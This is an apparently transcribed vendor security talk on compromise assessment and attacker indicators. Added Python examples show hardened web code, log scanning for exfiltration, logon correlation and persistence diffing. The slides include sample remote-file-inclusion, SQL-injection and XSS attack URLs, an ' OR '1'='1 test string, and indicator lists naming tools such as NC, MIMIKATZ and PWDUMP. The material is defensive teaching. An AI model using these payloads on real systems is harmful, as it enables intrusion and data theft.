Corey White, VP, Professional Services Cylance Mathematical Determination of Good and Bad Leveraging...
Corey White, VP, Professional Services, Cylance
Mathematical Determination of Good and Bad: Leveraging Preventative/Response Professional Services
PRESPONSE Professional Services
Risk Does Not Equal Threat | Presponse Compromise Assessment
Malware - Windows / Linux / OSX (31% didn’t use malware)
• Dropper/Downloaders – Phishing & Waterholing; malware in userspace; zero/single-day exploits that lead to…
• Backdoor Trojan RATs – Kernel interactive Service Binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)
• BOTNETs – Platforms for MAAS/Subscription Access
• WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)
Hacking - .day Exploits
• Zero Day – Vulnerability that only the developer knows about
• ½ Day – Vulnerability that is known about but no patches are yet available
• Single Day – Vulnerability that is known about and patches are available but not applied
• Forever Day – Vulnerability that is known and cannot be patched
Hacking - Web Server/Services Exploits
• Remote code execution (watch your .htaccess files!) – register_globals on in PHP | require ($page . ".php");
  http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt
• SQL injection (watch your user privileges!) – AND / OR in SQL $query | $query = "SELECT * FROM users WHERE username = '' or '1=1'";
  http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version)
• Cross Site Scripting/XSS (watch your syntax!) – Volatile entry in Echo | <?php echo "<p>Your Name <br />"; echo ($_GET[name_1]); ?>
  http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>
• Username enumeration (watch your error messages!) – Username guessing | Incorrect logon / password combination
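The four web-application weaknesses on this slide each have a well-known fix: an allowlist instead of a user-controlled include path, a parameterised query instead of string concatenation, output escaping before echoing request data, and one uniform logon failure message. The block below is an added example written for this page, not code from the talk or from Cylance; it ports the PHP patterns to Python so the weak and the hardened form can be run side by side, and the page keys, table layout and user rows are constructed.

```python
"""Hardened counterparts of the slide's web flaws: remote file inclusion via a
user-controlled include path, SQL injection, reflected XSS, and a logon error
that leaks whether the username exists. Added example, not from the talk."""
import html
import sqlite3

# Allowlist of includable pages (constructed). The ?page= parameter is a key
# into this table, never a path or URL, so page=http://.../c99.txt maps to the
# default instead of reaching require().
ALLOWED_PAGES = {"home": "pages/home.php", "about": "pages/about.php"}


def resolve_page(page_param: str) -> str:
    """Map ?page=... to a file only if it is an allowlisted key."""
    return ALLOWED_PAGES.get(page_param, ALLOWED_PAGES["home"])


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "hash-a"), ("bob", "hash-b")])
    return conn


def find_user_unsafe(conn, username: str) -> list:
    """The slide's pattern: the request value is concatenated into the SQL."""
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]


def find_user_safe(conn, username: str) -> list:
    """Parameterised query: the value is bound, never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


def render_name(name_param: str) -> str:
    """Escape before echoing so <script> is rendered as text, not executed."""
    return "<p>Your Name <br />" + html.escape(name_param, quote=True) + "</p>"


def logon_message(username_exists: bool, password_ok: bool) -> str:
    """Same message whether the username or the password was wrong, so the
    response cannot be used to enumerate valid accounts."""
    if username_exists and password_ok:
        return "Welcome"
    return "Incorrect logon / password combination"


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("unsafe:", find_user_unsafe(db, payload))   # every row comes back
    print("safe:  ", find_user_safe(db, payload))     # no row matches
    print(render_name("<script>HERE_IS_MY_CODE</script>"))
```

Running the module shows the concatenated query returning every user for the `' OR '1'='1` input while the bound query returns nothing, which is the difference the "watch your user privileges" note is getting at: least privilege limits the damage, but binding parameters removes the injection itself.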
Social Engineering – Access, Behavior, and Authority
Subversion
• Contractors
• Employees
Sabotage
• Phishing
• Waterholing
• USB “HoneyDrops” & other free hardware
• “HelpDesk Operators”
• “Visitors” (Repairmen, Janitors, Pizza/Flower Delivery, Tailgaters)
Advanced Persistent Threat - Activities
Stage 1 - Compromise
• Social Engineering Backdoors – Phishing / Waterholing; Help Desk / Visitors
• Web Site Backdoors
• Reconnaissance
Stage 2 - Exploit
• Privilege Escalation
• Lateral Movement
• User Profile Abuse
• Remote Access Provisioning
• Services Bypass/Cancellation
Stage 3 - Control
• Configuration Management
• Data Targeting
• Data Exfiltration
• Sabotage
• Subversion
Most commonly seen indicators of data loss:
• Non-standard Packagers (7z, Gz, RAR, PKZIP, etc.)
• Multipart Files of particular sizes (250/500Mb)
• “Recycle”/Recycle Bin Residue
• HTTP 206 Status Codes on Web Servers
• Non-standard File Transfer Services (Filezilla, FTP, WsFTP, etc.)
• Non-standard Reverse/Proxy Services (HUCs, PLINK, NC, SSH, etc.)
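Two of the data-loss indicators above, HTTP 206 responses and non-standard archive packages, can be pulled straight out of a web server's access log. The block below is an added example, not code from the talk: it parses constructed Apache combined-format log lines (the addresses, paths and timestamps are made up) and reports each client that either issued several ranged downloads answered with 206 or moved archive files, with the 250 MB chunk sizes chosen to mirror the multipart-file indicator.

```python
"""Scan web-server access log lines for two data-loss indicators from the
slide: HTTP 206 (partial content) responses and transfers of non-standard
archive packages. Added example; the log lines are constructed."""
import re
from collections import defaultdict

ARCHIVE_EXT = {".7z", ".gz", ".rar", ".zip", ".tar"}

# Apache combined log prefix: client ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Constructed sample: one client pulling a multipart RAR set in 250 MB ranged chunks.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Jun/2013:02:14:01 +0000] "GET /img/logo.png HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jun/2013:02:15:10 +0000] "GET /tmp/export.part1.rar HTTP/1.1" 206 262144000
198.51.100.7 - - [10/Jun/2013:02:17:43 +0000] "GET /tmp/export.part2.rar HTTP/1.1" 206 262144000
198.51.100.7 - - [10/Jun/2013:02:19:55 +0000] "GET /tmp/export.part3.rar HTTP/1.1" 206 262144000
203.0.113.9 - - [10/Jun/2013:02:20:02 +0000] "GET /docs/manual.pdf HTTP/1.1" 206 1048576
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def find_data_loss_indicators(log_text, min_partial=2):
    """Return {client: [reasons]} for clients matching either indicator.

    A client is reported when it received at least `min_partial` HTTP 206
    responses (ranged pulls of a large file) or transferred any archive type
    from ARCHIVE_EXT. Thresholds are illustrative, not from the talk."""
    partial = defaultdict(list)
    archives = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].lower()
        if rec["status"] == 206:
            partial[rec["client"]].append(path)
        if any(path.endswith(ext) for ext in ARCHIVE_EXT):
            archives[rec["client"]].append(path)

    findings = {}
    for client in set(partial) | set(archives):
        reasons = []
        if len(partial[client]) >= min_partial:
            reasons.append(f"{len(partial[client])} HTTP 206 responses")
        if archives[client]:
            reasons.append("archive transfer: " + ", ".join(archives[client]))
        if reasons:
            findings[client] = reasons
    return findings


if __name__ == "__main__":
    for client, reasons in find_data_loss_indicators(SAMPLE_LOG).items():
        print(client, "->", "; ".join(reasons))
```

A single 206 on a PDF (the second client) is normal resumable-download behaviour and stays below the threshold; the client that chunked three `.rar` parts trips both checks. In practice the same two counters would be keyed on the web server's own log format and joined against the file-creation alerts the later "Alert" slide recommends.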
Most commonly seen indicators of sabotage:
• Unusual Prefetch / Recent / LNK / Bash binary execution history
• AT / CRON Jobs
• Scripts
• Services Cancellation
• User Profile Authority Changes
Most commonly seen indicators of user profile abuse:
• Multiple user accounts on single computer
• User account on multiple computers
• Service & Administrative account propagation
• Extranet LDAP/AD account use
• Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)
• Local Services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)
Most commonly seen indicators of lateral movement:
• Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)
• MSTSC history (.RDP, .BMC)
• Remote job scheduling (AT, SC, WMIC, SSH)
• Redundant & non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PUTTY, PSEXEC, *FTP, SCP)
• Domain Services history (DSGET, DSQUERY, HYENA)
• Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)
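The user-profile-abuse indicators (multiple accounts on one computer, one account on many computers) and the lateral-movement indicators (type 3/4/8/10 logons) above come out of the same logon history. The block below is an added example, not from the talk or from Cylance: it correlates constructed logon records, modelled loosely on Windows logon events as (timestamp, host, account, logon type) tuples, and flags accounts spanning too many hosts, hosts carrying too many accounts, and remote logons outside a working-hours window. The thresholds and the working-hours window are assumptions for the demonstration.

```python
"""Correlate logon records for the user-profile-abuse and lateral-movement
indicators on the slides. Added example; the events are constructed."""
from collections import defaultdict
from datetime import datetime

# Constructed records: (timestamp, host, account, logon_type). Type 2 is a
# local interactive logon; 3/4/8/10 are the network/remote types named above.
SAMPLE_EVENTS = [
    ("2013-06-10 09:02:11", "WS-014", "CORP\\alice", 2),
    ("2013-06-10 09:40:30", "WS-014", "CORP\\alice", 3),
    ("2013-06-10 23:12:05", "FS-01", "CORP\\svc-backup", 3),
    ("2013-06-10 23:13:44", "WS-022", "CORP\\svc-backup", 10),
    ("2013-06-10 23:15:09", "WS-031", "CORP\\svc-backup", 10),
    ("2013-06-10 23:16:51", "DC-01", "CORP\\svc-backup", 3),
    ("2013-06-11 01:05:00", "WS-022", "CORP\\bob", 10),
    ("2013-06-11 01:06:30", "WS-022", "CORP\\carol", 10),
    ("2013-06-11 01:07:12", "WS-022", "CORP\\dave", 10),
]

REMOTE_TYPES = {3, 4, 8, 10}  # the logon types the slide calls out


def analyse_logons(events, max_hosts=2, max_accounts=2, work_hours=(7, 19)):
    """Return findings keyed by indicator name.

    max_hosts / max_accounts: how many distinct hosts per account (or accounts
    per host) are tolerated before the pattern is reported.
    work_hours: [start, end) hour window; remote logons outside it are listed."""
    hosts_per_account = defaultdict(set)
    accounts_per_host = defaultdict(set)
    off_hours = []
    for ts, host, account, ltype in events:
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if ltype not in REMOTE_TYPES:
            continue  # local console logons are not lateral movement
        hosts_per_account[account].add(host)
        accounts_per_host[host].add(account)
        if not (work_hours[0] <= t.hour < work_hours[1]):
            off_hours.append((ts, host, account, ltype))
    return {
        "account_on_many_hosts": {
            a: sorted(h) for a, h in hosts_per_account.items() if len(h) > max_hosts
        },
        "many_accounts_on_host": {
            h: sorted(a) for h, a in accounts_per_host.items() if len(a) > max_accounts
        },
        "off_hours_remote_logons": off_hours,
    }


if __name__ == "__main__":
    for indicator, hits in analyse_logons(SAMPLE_EVENTS).items():
        print(indicator, "->", hits)
```

In the sample the service account `svc-backup` touches four hosts by RDP and network logon in five minutes, and `WS-022` collects four distinct accounts overnight; those are exactly the "service & administrative account propagation" and "multiple user accounts on single computer" patterns, and every one of them also lands in the off-hours list.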
Most commonly seen indicators of insider threats:
• Unusual profile access and use history – time, HostID, application history, configuration history
• RBAC violations
• Other Acceptable Use Policy violations
• Malware / PUP / PUM…
Most common malware identifiers:
• Authority – service, administrator, or user
• Persistence – only 4 persistence mechanisms in Windows
• Communications – only 44 netsvcs keys in Windows Services
• Functionality – user and kernel combinations are rare
• File System – user or system
Issues Not Indicators
Focus on Priorities
Get Ahead of Compromise Activities
• Monitor
  – Persistence settings: registry keys, startup folders, scheduled jobs/tasks
  – Service creations
• Alert
  – User Profile Propagation
  – Lateral Movement/Access
  – Anomalous Use (time/resources)
  – Service State Changes (start/stop)
  – File creations by type (RAR, BAT, VBS, SH, etc.)
  – Sinkhole Communications
• Prevent
  – Assess and Secure Networks & Applications
  – Automated Tasks
  – Known PUP/PUMs
  – User-space Execution
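The "Monitor" bullets (persistence settings and service creations) are usually implemented as a baseline-and-diff: record the Run keys, startup folder, scheduled tasks and installed services once, then compare each later snapshot against that record. The block below is an added example, not code from the talk or from any Cylance product, and it does not read a live registry; it compares two constructed snapshots (all names and paths are made up) and reports what was added, removed or changed, with service creations broken out on their own.

```python
"""Baseline-and-diff over persistence settings and services. Added example;
both snapshots are constructed dictionaries of category -> {name: command}."""

STARTUP = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

# Constructed baseline captured on a known-clean host.
BASELINE = {
    "run_keys": {"SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    "startup_folder": {"desktop.ini": STARTUP + r"\desktop.ini"},
    "scheduled_tasks": {"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": "defrag.exe"},
    "services": {"Spooler": r"C:\Windows\System32\spoolsv.exe"},
}

# Constructed current snapshot: a new Run key, a retargeted task, a new service.
CURRENT = {
    "run_keys": {
        "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
        "Updater": r"C:\Users\Public\update.vbs",
    },
    "startup_folder": {"desktop.ini": STARTUP + r"\desktop.ini"},
    "scheduled_tasks": {"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": r"C:\Users\Public\d.bat"},
    "services": {
        "Spooler": r"C:\Windows\System32\spoolsv.exe",
        "RemoteSvc": r"C:\Windows\Temp\r.exe",
    },
}


def diff_persistence(baseline, current):
    """Return (category, change, name, detail) tuples for every difference.

    change is one of "added", "removed", "changed"; detail is the command for
    added/removed entries and "old -> new" for changed ones."""
    findings = []
    for category in sorted(set(baseline) | set(current)):
        old = baseline.get(category, {})
        new = current.get(category, {})
        for name in sorted(set(old) | set(new)):
            if name not in old:
                findings.append((category, "added", name, new[name]))
            elif name not in new:
                findings.append((category, "removed", name, old[name]))
            elif old[name] != new[name]:
                findings.append((category, "changed", name, f"{old[name]} -> {new[name]}"))
    return findings


def service_creations(findings):
    """The slide lists service creations separately; filter them out of the diff."""
    return [f for f in findings if f[0] == "services" and f[1] == "added"]


if __name__ == "__main__":
    diff = diff_persistence(BASELINE, CURRENT)
    for entry in diff:
        print(entry)
    print("new services:", service_creations(diff))
```

The value of the diff is in what it ignores: the unchanged SecurityHealth key and Spooler service produce nothing, so an analyst sees only the three entries that moved, and an entry whose name is unchanged but whose target now points into a user-writable directory is reported as "changed" rather than hidden behind a familiar task name.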
Prevent Victimization
[Slide diagram of victimization vectors: Candy Drop, Supply Chain, Social Engineering, Web, Direct Open Ports (TCP/135), Insider, Starvation]
Innovation Requires
WARNING: Deprogramming Required
JUST 100% Pure MATH
• NO Signatures
• NO Heuristics
• NO Behavioral
• NO Sandboxing
• NO Dynamic Detonation
• NO Micro-Virtualization
[Slide diagram: a spectrum from MALICIOUS (Blacklist) through “THE GREYLIST” / UNKNOWN to GOOD (Whitelist). Existing controls placed along it: Sandboxing, Servers AV, Antivirus / HIPS, Firewall, Email / Web Gateway, IDS/IPS, Whitelisting, Behavioral Analysis. The Blacklist and Whitelist ends each cover about 20%, leaving a GAP (60%+) that “100% Pure Math” is positioned to cover. Caption: Trust the Vendor vs. Trust the Math.]
Product Portfolio
JUNE 2013 – Infinity
• Free, Silent
• REST API over SSL
• Advanced Threat
• Over 5,000 seats
Detection only
OCTOBER 2013
• V-API
• V-Forensics
• V-Gateway
• V-Helpdesk
Detection only
FEBRUARY 2014
• Windows Agent
• Cloud management
• Silent / small footprint
Detection and Protection
DETECT / SWEEP*
APRIL 2014
• Browser delivery
• Detection of threats
• Silent / small footprint
Detection with Protection option